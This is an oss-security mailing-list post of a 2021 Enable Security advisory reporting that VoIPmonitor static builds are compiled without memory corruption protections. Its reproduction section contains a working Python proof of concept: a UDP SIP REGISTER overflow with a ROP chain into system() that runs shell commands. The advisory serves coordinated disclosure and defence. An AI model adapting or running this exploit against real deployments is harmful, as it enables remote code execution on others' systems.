'[oss-security] =?UTF-8?Q?ES2021-04:_VoIPmonitor_static_builds_are_compiled_without_any_?= =?UTF-8?Q?'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] =?UTF-8?Q?ES2021-04:_VoIPmonitor_static_builds_are_compiled_without_any_?= =?UTF-8?Q?
From:       "Sandro Gauci" <sandro () enablesecurity ! com>
Date:       2021-03-15 12:50:26
Message-ID: e835517e-f199-4cae-a9cb-33c89a77c916 () www ! fastmail ! com
[Download RAW message or body]

# VoIPmonitor static builds are compiled without any standard memory corruption \
protection

- Fixed versions: N/A
- Enable Security Advisory: \
https://github.com/EnableSecurity/advisories/tree/master/ES2021-04-voipmonitor-staticbuild-memory-corruption-protection
                
- VoIPmonitor Security Advisory: none
- Tested vulnerable versions: 27.5
- Timeline:
    - Report date: 2021-02-10 & 2021-02-13
	- Enable Security advisory: 2021-03-15

## Description

The binaries available for download at <https://www.voipmonitor.org/download> are \
built without any memory corruption protection in place. The following is output from \
the tool `hardening-check`:

```
hardening-check voipmonitor:
 Position Independent Executable: no, normal executable!
 Stack protected: no, not found!
 Fortify Source functions: unknown, no protectable libc functions used
 Read-only relocations: no, not found!
 Immediate binding: no, not found!
 Stack clash protection: unknown, no -fstack-clash-protection instructions found
 Control flow integrity: unknown, no -fcf-protection instructions found!
```

When stack protection together with Fortify Source and other protection mechanisms \
are in place, exploitation of memory corruption vulnerabilities normally results in a \
program crash instead of leading to remote code execution. Most modern compilation \
systems create executable binaries with these features built-in by default. When \
these features are not used, attackers may easily exploit memory corruption \
vulnerabilities, such as buffer overflows, to run arbitrary code. In this advisory we \
will demonstrate how a buffer overflow reported in a separate advisory, could be \
abused to run arbitrary code because of the lack of standard memory corruption \
protection in the static build releases of VoIPmonitor.

The vendor has explained that:

> we are not going to enable the protection in the static builds as the speed is \
> critical on many installations

> Our static build also uses tcmalloc (recommended version) which is required for \
> high packet/second processing as the libc allocator is not fast enough especially \
> on NUMA systems. For high packet/second traffic FORTIFY_SOURCE can introduce a lot \
> of additional CPU cycles. If using custom builds with FORTIFY_SOURCE - they should \
> compare if the sniffer did not introduced higher CPU usage.

While we understand the vendor's position, we are issuing an advisory to ensure that \
end users can make informed risk-based decisions.

## Impact

The lack of standard memory corruption protection mechanisms means that such \
vulnerabilities may lead to remote code execution.

## How to reproduce the issue

1. Execute the static build of VoIPmonitor (such as \
https://www.voipmonitor.org/current-stable-sniffer-static-64bit.tar.gz) 2. Start the \
live sniffer from the VOIPMonitor GUI or via the manager on port 5029 3. Execute the \
following Python program so that VOIPMonitor is able to capture the packet 4. Observe \
                the payload being executed by the `voipmonitor` process, i.e. the \
                following:
    - current user is printed due to execution of the `whoami` command
    - `h4x0r was here` is also printed
    - a file has been created in `/tmp/woot`

```python
import struct
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

payload_size=32607
# Pad with As
payload = b'A' * 703
payload_size-=len(payload)

# Write system payload
cmd=b'whoami;echo "h4x0r was here";touch /tmp/woot\x00'
payload+=cmd
payload_size-=len(cmd)

# Pad some more so that we can overwrite the save_packet_sql's function return \
address payload += b'A' * payload_size

# Call a ROP gadged that increments the value of the RDI register, 
# which will now point to the value set by cmd
payload += struct.pack('<Q', 0x0000000000b222f1)

# Return to system() to execute the value in RDI
payload += struct.pack('<Q', 0xb22fd0)

# Return to exit() to exit gracefully
payload += struct.pack('<Q', 0xf60a20)

msg=b'REGISTER %s SIP/2.0\r\n' % (payload)
msg+=b'Via: SIP/2.0/UDP \
192.168.1.132:35393;rport;branch=z9hG4bK-kwtTkrdNAO2Wvw0v\r\n' msg+=b'Max-Forwards: \
70\r\n' msg+=b'From: <sip:85861710@demo.sipvicious.pro>;tag=mnq1nKGNZHNUkNOG\r\n'
msg+=b'To: <sip:85861710@demo.sipvicious.pro>\r\n'
msg+=b'Call-ID: 93X9dNZO2qdcfpdu\r\n'
msg+=b'CSeq: 1 REGISTER\r\n'
msg+=b'Contact: <sip:85861710@192.168.1.132:35393;transport=udp>\r\n'
msg+=b'Expires: 60\r\n'
msg+=b'Content-Length: 0\r\n'
msg+=b'\r\n'
s.sendto(msg, ('167.71.58.84', 5060))

```

## Solution and recommendations

Users who would like to have standard memory corruption protection for VoIPmonitor \
should compile the binaries themselves and apply their own upgrades rather than using \
the upgrade feature from the VoIPmonitor GUI / sensors page.

We recommended the following to the vendor:

> Our recommendation is that standard memory corruption protection be switched on by \
> default in the official binary build of VoIPmonitor. If there are specific \
> requirements for specific systems that require such features to be switched off, \
> then additional binaries should be offered, with adequate documentation of the \
> risks involved.

> Do note that memory corruption vulnerabilities should also be addressed and fixed \
> even if security features, such as Fortify, are used.

## Acknowledgements

Enable Security would like to thank Martin Vit and the developers at VoIPmonitor for \
the very quick responses and explanations with regards to this security issue.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools \
and provides quality penetration testing to help protect your real-time \
communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing \
based on currently available information. Use of the information constitutes \
acceptance for use in an AS IS condition. There are no warranties with regard to this \
information. Neither the author nor the publisher accepts any liability for any \
direct, indirect, or consequential loss or damage arising from use of, or reliance \
on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can \
be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.


--
 
    Sandro Gauci, CEO at Enable Security GmbH

    Register of Companies:       AG Charlottenburg HRB 173016 B
    Company HQ:                       Neuburger Straße 101 b, 94036 Passau, Germany
    PGP/Encrypted comms:       https://keybase.io/sandrogauci
    Our blog:                                https://www.rtcsec.com
    Other points of contact:       https://enablesecurity.com/#contact-us


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic